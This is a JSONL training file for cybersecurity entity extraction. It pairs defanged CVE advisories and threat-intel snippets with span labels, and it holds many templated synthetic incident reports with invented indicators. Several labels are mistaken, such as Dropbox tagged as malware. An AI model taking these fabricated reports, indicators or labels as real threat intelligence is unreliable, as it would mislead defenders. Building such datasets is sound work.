{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668) does not check that the `batch_dims` value that the user supplies is less than the rank of the input tensor. Since the implementation uses several for loops over the dimensions of `tensor`, this results in reading data from outside the bounds of heap allocated buffer backing the tensor. We have patched the issue in GitHub commit bc9c546ce7015c57c2f15c168b3d9201de679a1d. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668": [[321, 468]], "Indicator: bc9c546ce7015c57c2f15c168b3d9201de679a1d": [[801, 841]], "Organization: GitHub": [[787, 793]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37654"}}
{"text": "In YzmCMS 5.6, stored XSS exists via the common/static/plugin/ueditor/1 [ . ] 4 [ . ] 3 [ . ] 3/php/controller.php action parameter, which allows remote attackers to upload a swf file. The swf file can be injected with arbitrary web script or HTML.", "spans": {"Indicator: 1.4.3.3": [[70, 95]], "Vulnerability: stored XSS": [[15, 25]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-23370"}}
{"text": "File Name : ati[ . ]exe .", "spans": {"Indicator: ati.exe": [[12, 23]]}, "info": {"id": "cyberner_stix_train_006520", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: BlackCat (SHA256: fec1a163206af4199a737eab445a207af3967c8a831a327c70feb7c29722739a). Upon execution on Citrix NetScaler, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe and injects into legitimate processes. Network analysis shows beaconing to 192[.]120[.]47[.]194 every 60 seconds and DNS queries to mailstorage[.]net. The second stage was fetched from hxxp://storageapi[ . ]online/panel/index.html and written to C:\\Program Files\\Common Files\\lsass.dmp. The payload uses WinPEAS-style techniques for defense evasion. A secondary hash (SHA256: e39b89896b184198693ea1b1f8548f6b8b25ea915f7369e10bd575e4c5fc5473) was extracted from the unpacked payload.", "spans": {"Malware: BlackCat": [[25, 33]], "Indicator: fec1a163206af4199a737eab445a207af3967c8a831a327c70feb7c29722739a": [[43, 107]], "System: Citrix NetScaler": [[128, 144]], "Indicator: 192.120.47.194": [[285, 305]], "Indicator: mailstorage.net": [[342, 359]], "Indicator: http://storageapi.online/panel/index.html": [[395, 440]], "Indicator: e39b89896b184198693ea1b1f8548f6b8b25ea915f7369e10bd575e4c5fc5473": [[586, 650]]}, "info": {"id": "synth_v2_00561", "source": "defanged_augment"}}
{"text": "This High severity RCE (Remote Code Execution)  vulnerability was introduced in versions 9.6.0, 10.0.0, 10.1.0, 10.2.0, 11.0.0, 11.1.0, 12.0.0, and 12.1.0 of Bamboo Data Center.\r\n\r\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 8.6, allows an authenticated attacker to execute malicious code on the remote system.\r\n\r\nAtlassian recommends that Bamboo Data Center customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\r\n Bamboo Data Center 9.6: Upgrade to a release greater than or equal to 9.6.24\r\n\r\n Bamboo Data Center 10.2: Upgrade to a release greater than or equal to 10.2.16\r\n\r\n Bamboo Data Center 12.1: Upgrade to a release greater than or equal to 12.1.3\r\n\r\nSee the release notes ([hxxps://confluence[ . ]atlassian[ . ]com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center from the download center ([hxxps://www[ . ]atlassian[ . ]com/software/bamboo/download-archives]).\r\n\r\nThis vulnerability was reported via our Atlassian (Internal) program.", "spans": {"Indicator: https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]": [[792, 885]], "Indicator: https://www.atlassian.com/software/bamboo/download-archives]": [[973, 1041]], "Organization: Atlassian": [[339, 348], [1087, 1096]], "Vulnerability: Remote Code Execution": [[24, 45], [191, 212]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-21570"}}
{"text": "Vulnerability Advisory: CVE-2024-23826 is a critical use-after-free affecting SonicWall SMA. Zscaler ThreatLabz confirmed active exploitation by Granite Typhoon in the wild. Exploitation delivers AsyncRAT (SHA1: cae555f12d0970b695ad8d92a72f89dd3b2c69d9) which is dropped to C:\\Users\\Public\\Documents\\lsass.dmp. The exploit payload is hosted at hxxps://backupdata[.]info/api/v2/auth and communicates to 64[.]152[.]169[.]193 for C2.", "spans": {"Vulnerability: CVE-2024-23826": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: SonicWall SMA": [[78, 91]], "Organization: Zscaler ThreatLabz": [[93, 111]], "Malware: AsyncRAT": [[196, 204]], "Indicator: cae555f12d0970b695ad8d92a72f89dd3b2c69d9": [[212, 252]], "Indicator: https://backupdata.info/api/v2/auth": [[344, 381]], "Indicator: 64.152.169.193": [[402, 422]]}, "info": {"id": "synth_v2_00849", "source": "defanged_augment"}}
{"text": "Blog Post by SentinelOne: Tracking Gamaredon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-14163 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from hr@auth-check[.]org delivering Emotet. Post-compromise, the attackers deploy Gootloader and use Burp Suite for reconnaissance. C2 infrastructure includes 192 [ . ] 161 [ . ] 124 [ . ] 15 and proxyupdate[.]org. A staging server at hxxp://nodecache[.]com/gate.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\runtime.dll (MD5: 82cf5d7144770c29843e405e95a25bfb).", "spans": {"Organization: SentinelOne": [[13, 24]], "Vulnerability: CVE-2025-14163": [[124, 138]], "System: Progress Telerik": [[147, 163]], "Indicator: hr@auth-check.org": [[239, 258]], "Malware: Emotet": [[270, 276]], "Malware: Gootloader": [[316, 326]], "Indicator: 192.161.124.15": [[393, 425]], "Indicator: proxyupdate.org": [[430, 447]], "Indicator: hxxp://nodecache.com/gate.php": [[469, 500]], "Indicator: 82cf5d7144770c29843e405e95a25bfb": [[585, 617]]}, "info": {"id": "synth_v2_01648", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-12847 is a critical authentication bypass affecting Palo Alto PAN-OS. INTERPOL confirmed active exploitation by Diamond Sleet in the wild. Exploitation delivers Cobalt Strike (SHA1: 33d466aab42eeede24bda56aa97b1d494cdabafb) which is dropped to /home/user/.config/payload.bin. The exploit payload is hosted at hxxps://storagegateway[.]net/portal/verify and communicates to 10 [ . ] 122 [ . ] 231 [ . ] 71 for C2.", "spans": {"Vulnerability: CVE-2022-12847": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Palo Alto PAN-OS": [[85, 101]], "Organization: INTERPOL": [[103, 111]], "Malware: Cobalt Strike": [[194, 207]], "Indicator: 33d466aab42eeede24bda56aa97b1d494cdabafb": [[215, 255]], "Indicator: hxxps://storagegateway.net/portal/verify": [[342, 384]], "Indicator: 10.122.231.71": [[405, 436]]}, "info": {"id": "synth_v2_00662", "source": "defanged_augment"}}
{"text": "Report_URL : hxxps://dragos[ . ]com/resource/xenotime/", "spans": {"Indicator: https://dragos.com/resource/xenotime/": [[13, 54]]}, "info": {"id": "cyberner_stix_train_006691", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at /dev/shm/lsass.dmp. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /opt/app/bin/dropper.ps1. Network forensics identified connections to 10[.]81[.]132[.]178 and data-relay[ . ]xyz. Email headers traced the initial vector to finance@auth-check[.]org. File /home/user/.config/agent.py (MD5: fdc7e61a8a7f2450b81e0806b6823ec6) was identified as the initial dropper. A staging URL hxxps://data-api[ . ]live/panel/index.html resolved to 172 [ . ] 201 [ . ] 97 [ . ] 186. Secondary artifact hash: SHA256: 1b5bc5901a6c11a892975e4e1e8c329abb196b9506532825abb6d6d4c6624ce2.", "spans": {"Indicator: 10.81.132.178": [[291, 310]], "Indicator: data-relay.xyz": [[315, 333]], "Indicator: finance@auth-check.org": [[378, 402]], "Indicator: fdc7e61a8a7f2450b81e0806b6823ec6": [[443, 475]], "Indicator: hxxps://data-api.live/panel/index.html": [[530, 572]], "Indicator: 172.201.97.186": [[585, 617]], "Indicator: 1b5bc5901a6c11a892975e4e1e8c329abb196b9506532825abb6d6d4c6624ce2": [[652, 716]]}, "info": {"id": "synth_v2_01227", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Check Point Research identified a large-scale phishing operation. Emails originated from notification@mail-service[ . ]info and service@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://logincdn[ . ]net/panel/index.html which hosted a credential harvesting page on node-login[.]dev. A secondary link hxxp://sync-update[ . ]link/assets/js/payload.js delivered BlackCat (SHA256: 21ffb20ef4d851ecba27c2772a38ac7d43e6027cc218b2bf982a5b6ab6d8634b). The malware was saved to C:\\Windows\\Tasks\\implant.so and established C2 with 1 [ . ] 76 [ . ] 200 [ . ] 37.", "spans": {"Organization: Check Point Research": [[26, 46]], "Indicator: notification@mail-service.info": [[115, 149]], "Indicator: service@identity-verify.cc": [[154, 184]], "Indicator: hxxps://logincdn.net/panel/index.html": [[241, 282]], "Indicator: node-login.dev": [[328, 344]], "Indicator: hxxp://sync-update.link/assets/js/payload.js": [[363, 411]], "Malware: BlackCat": [[422, 430]], "Indicator: 21ffb20ef4d851ecba27c2772a38ac7d43e6027cc218b2bf982a5b6ab6d8634b": [[440, 504]], "Indicator: 1.76.200.37": [[584, 613]]}, "info": {"id": "synth_v2_00916", "source": "defanged_augment"}}
{"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc[ . ]txt file .", "spans": {"Malware: Cannon": [[0, 6]], "Indicator: auddevc.txt": [[172, 187]]}, "info": {"id": "cyberner_stix_train_004857", "source": "defanged_augment"}}
{"text": "In gokey versions <0.2.0,\n a flaw in the seed decryption logic resulted in passwords incorrectly \nbeing derived solely from the initial vector and the AES-GCM \nauthentication tag of the key seed.\n\n\nThis issue has been fixed in gokey version 0.2.0. This is a breaking change. The fix has invalidated any passwords/secrets that were derived from the seed file (using the -s option). Even if the input seed file stays the same, version 0.2.0 gokey will generate different secrets.\n\n\nImpact\nThis vulnerability impacts generated keys/secrets using a seed file as an entropy input (using the -s option). Keys/secrets generated just from the master password (without the -s\n option) are not impacted. The confidentiality of the seed itself is \nalso not impacted (it is not required to regenerate the seed itself). \nSpecific impact includes:\n\n\n\n  *  keys/secrets generated from a seed file may have lower entropy: it \nwas expected that the whole seed would be used to generate keys (240 \nbytes of entropy input), where in vulnerable versions only 28 bytes was \nused\n\n  *  a malicious entity could have recovered all passwords, generated \nfrom a particular seed, having only the seed file in possession without \nthe knowledge of the seed master password\n\n\n\n\nPatches\nThe code logic bug has been fixed in gokey version 0.2.0\n and above. Due to the deterministic nature of gokey, fixed versions \nwill produce different passwords/secrets using seed files, as all seed \nentropy will be used now.\n\n\nSystem secret rotation guidance\nIt is advised for users to regenerate passwords/secrets using the patched version of gokey (0.2.0\n and above), and provision/rotate these secrets into respective systems \nin place of the old secret. A specific rotation procedure is \nsystem-dependent, but most common patterns are described below.\n\n\nSystems that do not require the old password/secret for rotation\nSuch systems usually have a \"Forgot password\" facility or a\n similar facility allowing users to rotate their password/secrets by \nsending a unique \"magic\" link to the user's email or phone. In such \ncases users are advised to use this facility and input the newly \ngenerated password secret, when prompted by the system.\n\n\nSystems that require the old password/secret for rotation\nSuch systems usually have a modal password rotation window\n usually in the user settings section requiring the user to input the \nold and the new password sometimes with a confirmation. To \ngenerate/recover the old password in such cases users are advised to:\n\n\n\n  *  temporarily download  gokey version 0.1.3 hxxps://github[.]com/cloudflare/gokey/releases/tag/v0.1.3  for their respective operating system to recover the old password\n\n  *  use gokey version 0.2.0 or above to generate the new password\n\n  *  populate the system provided password rotation form\n\n\n\n\nSystems that allow multiple credentials for the same account to be provisioned\nSuch systems usually require a secret or a cryptographic \nkey as a credential for access, but allow several credentials at the \nsame time. One example is SSH: a particular user may have several \nauthorized public keys configured on the SSH server for access. For such\n systems users are advised to:\n\n\n\n  *  generate a new secret/key/credential using gokey version 0.2.0 or above\n\n  *  provision the new secret/key/credential in addition to the existing credential on the system\n\n  *  verify that the access or required system operation is still possible with the new secret/key/credential\n\n  *  revoke authorization for the existing/old credential from the system\n\n\n\n\nCredit\nThis vulnerability was found by Théo Cusnir ( @mister_mime hxxps://hackerone[ . ]com/mister_mime ) and responsibly disclosed through Cloudflare's bug bounty program.", "spans": {"Indicator: https://github.com/cloudflare/gokey/releases/tag/v0.1.3": [[2571, 2628]], "Indicator: https://hackerone.com/mister_mime": [[3639, 3676]], "Organization: Cloudflare": [[3713, 3723]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-13353"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed WinPEAS artifacts at /opt/app/bin/payload.bin. Memory dump analysis confirmed execution of BloodHound. Registry modifications pointed to persistence via /opt/app/bin/update.dll. Network forensics identified connections to 81[.]100[.]81[.]118 and loginsync[.]cc. Email headers traced the initial vector to billing@account-update[ . ]xyz. File C:\\Users\\admin\\Downloads\\helper.sh (SHA256: b9129fd69d142aa211d46f0c62109f5aed20b61a69583e2f8f50d0b907afba26) was identified as the initial dropper. A staging URL hxxp://data-sync[.]online/api/v2/auth resolved to 172[.]169[.]60[.]73. Secondary artifact hash: SHA256: 0ebf46845afb8ecdb0a78d131de17dadb11f2665ecac94cb4443d790afa1ff51.", "spans": {"Indicator: 81.100.81.118": [[294, 313]], "Indicator: loginsync.cc": [[318, 332]], "Indicator: billing@account-update.xyz": [[377, 407]], "Indicator: b9129fd69d142aa211d46f0c62109f5aed20b61a69583e2f8f50d0b907afba26": [[458, 522]], "Indicator: http://data-sync.online/api/v2/auth": [[577, 614]], "Indicator: 172.169.60.73": [[627, 646]], "Indicator: 0ebf46845afb8ecdb0a78d131de17dadb11f2665ecac94cb4443d790afa1ff51": [[681, 745]]}, "info": {"id": "synth_v2_01262", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/mlx5: Return the firmware result upon destroying QP/RQ\n\nPreviously when destroying a QP/RQ, the result of the firmware\ndestruction function was ignored and upper layers weren't informed\nabout the failure.\nWhich in turn could lead to various problems since when upper layer\nisn't aware of the failure it continues its operation thinking that the\nrelated QP/RQ was successfully destroyed while it actually wasn't,\nwhich could lead to the below kernel WARN.\n\nCurrently, we return the correct firmware destruction status to upper\nlayers which in case of the RQ would be mlx5_ib_destroy_wq() which\nwas already capable of handling RQ destruction failure or in case of\na QP to destroy_qp_common(), which now would actually warn upon qp\ndestruction failure.\n\nWARNING: CPU: 3 PID: 995 at drivers/infiniband/core/rdma_core.c:940 uverbs_destroy_ufile_hw+0xcb/0xe0 [ib_uverbs]\nModules linked in: xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi rdma_cm ib_umad ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core overlay mlx5_core fuse\nCPU: 3 PID: 995 Comm: python3 Not tainted 5.16.0-rc5+ #1\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[ . ]13[ . ]0-0-gf21b5a4aeb02-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:uverbs_destroy_ufile_hw+0xcb/0xe0 [ib_uverbs]\nCode: 41 5c 41 5d 41 5e e9 44 34 f0 e0 48 89 df e8 4c 77 ff ff 49 8b 86 10 01 00 00 48 85 c0 74 a1 4c 89 e7 ff d0 eb 9a 0f 0b eb c1 <0f> 0b be 04 00 00 00 48 89 df e8 b6 f6 ff ff e9 75 ff ff ff 90 0f\nRSP: 0018:ffff8881533e3e78 EFLAGS: 00010287\nRAX: ffff88811b2cf3e0 RBX: ffff888106209700 RCX: 0000000000000000\nRDX: ffff888106209780 RSI: ffff8881533e3d30 RDI: ffff888109b101a0\nRBP: 0000000000000001 R08: ffff888127cb381c R09: 0de9890000000009\nR10: ffff888127cb3800 R11: 0000000000000000 R12: ffff888106209780\nR13: ffff888106209750 R14: ffff888100f20660 R15: 0000000000000000\nFS:  00007f8be353b740(0000) GS:ffff88852c980000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f8bd5b117c0 CR3: 000000012cd8a004 CR4: 0000000000370ea0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n <TASK>\n ib_uverbs_close+0x1a/0x90 [ib_uverbs]\n __fput+0x82/0x230\n task_work_run+0x59/0x90\n exit_to_user_mode_prepare+0x138/0x140\n syscall_exit_to_user_mode+0x1d/0x50\n ? __x64_sys_close+0xe/0x40\n do_syscall_64+0x4a/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f8be3ae0abb\nCode: 03 00 00 00 0f 05 48 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 83 43 f9 ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 0c e8 c1 43 f9 ff 8b 44\nRSP: 002b:00007ffdb51909c0 EFLAGS: 00000293 ORIG_RAX: 0000000000000003\nRAX: 0000000000000000 RBX: 0000557bb7f7c020 RCX: 00007f8be3ae0abb\nRDX: 0000557bb7c74010 RSI: 0000557bb7f14ca0 RDI: 0000000000000005\nRBP: 0000557bb7fbd598 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000293 R12: 0000557bb7fbd5b8\nR13: 0000557bb7fbd5a8 R14: 0000000000001000 R15: 0000557bb7f7c020\n </TASK>", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[1315, 1375]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1273, 1277]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-53286"}}
{"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals . In ping mode, Glimpse uses a [.]NET . Figure 8 : Scilc.exe usage example", "spans": {"Organization: Apple": [[91, 96]], "Malware: Glimpse": [[237, 244]], "Indicator: a .NET": [[250, 258]]}, "info": {"id": "cyberner_stix_train_001477", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8[.]0[.]0[.]0-8 [ . ] 4 [ . ] 0 [ . ] 5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 8.0.0.0": [[178, 191]], "Indicator: 8.4.0.5": [[192, 217]], "Organization: Oracle": [[21, 27], [86, 92], [326, 332], [498, 504], [718, 724], [839, 845]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14787"}}
{"text": "Volexity detected a multi-stage attack chain. The initial phishing email from ceo@phishing-domain[.]com contained a link to hxxp://update-portal[ . ]dev/download/update.exe. This redirected to hxxp://relaycloud[ . ]cc/admin/config on static-secure[.]info. A secondary email from contact@document-share[ . ]link pointed to hxxp://portal-update[ . ]info/collect which delivered Lumma Stealer. The final payload callback was hxxp://loginstatic[.]cc/api/v2/auth resolving to 139 [ . ] 86 [ . ] 30 [ . ] 148 via synccloud[.]top.", "spans": {"Organization: Volexity": [[0, 8]], "Indicator: ceo@phishing-domain.com": [[78, 103]], "Indicator: hxxp://update-portal.dev/download/update.exe": [[124, 172]], "Indicator: hxxp://relaycloud.cc/admin/config": [[193, 230]], "Indicator: static-secure.info": [[234, 254]], "Indicator: contact@document-share.link": [[279, 310]], "Indicator: hxxp://portal-update.info/collect": [[322, 359]], "Malware: Lumma Stealer": [[376, 389]], "Indicator: hxxp://loginstatic.cc/api/v2/auth": [[422, 457]], "Indicator: 139.86.30.148": [[471, 502]], "Indicator: synccloud.top": [[507, 522]]}, "info": {"id": "synth_v2_01818", "source": "defanged_augment"}}
{"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . The vulnerability exists in the old Equation Editor ( EQNEDT32[.]EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"Malware: Backdoor": [[0, 8]], "Malware: Equation Editor": [[150, 165]], "Indicator: EQNEDT32.EXE": [[168, 182]], "Organization: Microsoft": [[202, 211]]}, "info": {"id": "cyberner_stix_train_006035", "source": "defanged_augment"}}
{"text": "This diagram illustrates the whole process . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . APT17 : 121 [ . ] 101 [ . ] 73 [ . ] 231 . Clients using Internet Explorer version 8 are served with “ about.htm ” , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads “ JavaApplet.html ” .", "spans": {"Indicator: 121.101.73.231": [[211, 243]], "System: Internet Explorer version 8": [[260, 287]]}, "info": {"id": "cyberner_stix_train_003899", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9946 Trojan.Win32.Shifu.aoc Packed.Win32.TDSS.~AA Packed:W32/PeCan.A FDOS.Chalcol BehavesLike[ . ]Win32[ . ]Virut[ . ]cc Dos.Chalcol.a DoS:Win32/Chalcol.A Trojan.Win32.Shifu.aoc DoS.Chalcol Win32/DoS.Chalcol.A Win32.Trojan.Chalcol.Wpsv DoS.Win32.Chalcol Win32/Trojan.DoS.0cc", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.cc": [[146, 184]]}, "info": {"id": "cyner2_train_001859", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Dropped:Backdoor.SchoolBus.C Backdoor.Schoolbus BackDoor-BL.dr Backdoor.W32.Schoolbus!c W32/Backdoor2.XLL Backdoor.Trojan BKDR_SCHOOLBUS.C Dropped:Backdoor.SchoolBus.C Backdoor.Win32.SchoolBus.15 Dropped:Backdoor.SchoolBus.C Backdoor.Win32.Z.Schoolbus.257515 Dropped:Backdoor.SchoolBus.C Dropped:Backdoor.SchoolBus.C BackDoor.SchoolBus Email-Worm.Win32.GOPworm.196 BKDR_SCHOOLBUS.C BehavesLike.Win32.Dropper.dc W32/Backdoor.CDSN-7186 BDS/SchoolBus.C.DR.8 Backdoor:Win32/Schoolbus.C.dr Backdoor.Win32.SchoolBus.15 Backdoor/Win32.Trojan.C197204 Dropped:Backdoor.SchoolBus.C Email-Worm.Win32.GOPworm.196 Backdoor.Schoolbus Bck/Iroffer[.]BG Backdoor.SchoolBus.C Win32/SchoolBus.C Win32.Backdoor.Schoolbus.pfo Backdoor.SchoolBus.C Win32/Trojan.374", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[650, 662]]}, "info": {"id": "cyner2_train_005338", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at C:\\Windows\\Temp\\backdoor.elf - SHA256: c8681ef6dec549bdaee3fa06b8950419507529ed032ad06082553aed550c08af\nStage 2 loader at /var/tmp/chrome_helper.exe - SHA1: ea0fdba952f559f0ff3dfff4f6fd4f9311bfa1fd\nFinal payload at /dev/shm/dropper.ps1 - SHA1: 35aec5b1c69bf2a59ea7982f14c40fed313e1e48\nExfiltration module - SHA256: 7247041adadb50a0bd5e0d05f734bdc4e2e816ccbb4701a046b0dc92a3273b96\nAll stages communicated with 10[.]50[.]114[.]199. CrackMapExec signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: c8681ef6dec549bdaee3fa06b8950419507529ed032ad06082553aed550c08af": [[101, 165]], "Indicator: ea0fdba952f559f0ff3dfff4f6fd4f9311bfa1fd": [[219, 259]], "Indicator: 35aec5b1c69bf2a59ea7982f14c40fed313e1e48": [[306, 346]], "Indicator: 7247041adadb50a0bd5e0d05f734bdc4e2e816ccbb4701a046b0dc92a3273b96": [[377, 441]], "Indicator: 10.50.114.199": [[471, 490]]}, "info": {"id": "synth_v2_01928", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from admin@mail-service[ . ]info and alert@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxp://update-storage[.]live/login which hosted a credential harvesting page on mailedge[ . ]site. A secondary link hxxps://auth-mail[.]dev/callback delivered Gootloader (SHA1: 3530996f64f99ea5b9acda39b55feef3570b983e). The malware was saved to /var/tmp/helper.sh and established C2 with 60 [ . ] 158 [ . ] 46 [ . ] 24.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: admin@mail-service.info": [[105, 132]], "Indicator: alert@identity-verify.cc": [[137, 165]], "Indicator: hxxp://update-storage.live/login": [[222, 256]], "Indicator: mailedge.site": [[302, 319]], "Indicator: hxxps://auth-mail.dev/callback": [[338, 370]], "Malware: Gootloader": [[381, 391]], "Indicator: 3530996f64f99ea5b9acda39b55feef3570b983e": [[399, 439]], "Indicator: 60.158.46.24": [[510, 540]]}, "info": {"id": "synth_v2_00932", "source": "defanged_augment"}}
{"text": "We also registered one episode of mobile malware spreading via a third-party botnet . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 . In the case where the parent process is hpqhvind[.]exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory . Sometimes this was a high profile , legitimate site such as ‘ diplomacy[.]pl ’ hosting a ZIP archive .", "spans": {"Indicator: hpqhvind.exe": [[338, 352]], "Indicator: diplomacy.pl": [[549, 563]]}, "info": {"id": "cyberner_stix_train_000462", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-29234 is a critical race condition affecting Zyxel USG. Dragos confirmed active exploitation by Sandworm in the wild. Exploitation delivers RedLine Stealer (MD5: 2b2d2064ca04c1eb9c88184e87fd5425) which is dropped to C:\\Users\\admin\\Desktop\\chrome_helper.exe. The exploit payload is hosted at hxxps://portalauth[ . ]com/portal/verify and communicates to 30 [ . ] 23 [ . ] 15 [ . ] 131 for C2.", "spans": {"Vulnerability: CVE-2026-29234": [[24, 38]], "Vulnerability: race condition": [[53, 67]], "System: Zyxel USG": [[78, 87]], "Organization: Dragos": [[89, 95]], "Malware: RedLine Stealer": [[173, 188]], "Indicator: 2b2d2064ca04c1eb9c88184e87fd5425": [[195, 227]], "Indicator: hxxps://portalauth.com/portal/verify": [[324, 364]], "Indicator: 30.23.15.131": [[385, 415]]}, "info": {"id": "synth_v2_00770", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 34 [ . ] 10 [ . ] 10 [ . ] 206, the Sophos X-Ops IR team identified Royal running as C:\\Users\\admin\\Desktop\\helper.sh. The threat actor, believed to be Velvet Tempest, used Sharphound for credential harvesting and Metasploit for lateral movement. Exfiltrated data was sent to cdn-node[ . ]xyz and edgecloud[ . ]org. The initial dropper (MD5: 99e48da1c6cb06c73ddab33244783f5a) was delivered via a phishing email from contact@login-portal[ . ]tech. A second C2 node was observed at 24 [ . ] 170 [ . ] 180 [ . ] 197, with a persistence mechanism writing to /home/user/.config/config.dat.", "spans": {"Indicator: 34.10.10.206": [[64, 94]], "Organization: Sophos X-Ops": [[100, 112]], "Malware: Royal": [[132, 137]], "Indicator: cdn-node.xyz": [[340, 356]], "Indicator: edgecloud.org": [[361, 378]], "Indicator: 99e48da1c6cb06c73ddab33244783f5a": [[406, 438]], "Indicator: contact@login-portal.tech": [[480, 509]], "Indicator: 24.170.180.197": [[544, 576]]}, "info": {"id": "synth_v2_00435", "source": "defanged_augment"}}
{"text": "With Version 0[.]0[.]0[.]1 , there is a dedicated functions class where all main malicious activity happens and can be observed . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"Organization: Rapid7": [[130, 136]], "Malware: Dropbox": [[222, 229]], "Malware: POWRUNER": [[242, 250]], "Indicator: RTF file": [[283, 291]], "Vulnerability: CVE-2017-0199": [[307, 320]], "Indicator: 0.0.0.1": [[13, 26]]}, "info": {"id": "cyberner_stix_train_005785", "source": "defanged_augment"}}
